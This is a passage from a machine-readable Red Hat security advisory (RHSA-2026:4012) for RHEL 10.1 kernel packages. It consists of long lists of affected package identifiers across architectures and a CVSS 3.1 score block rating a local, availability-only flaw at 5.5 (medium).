"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:4012"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
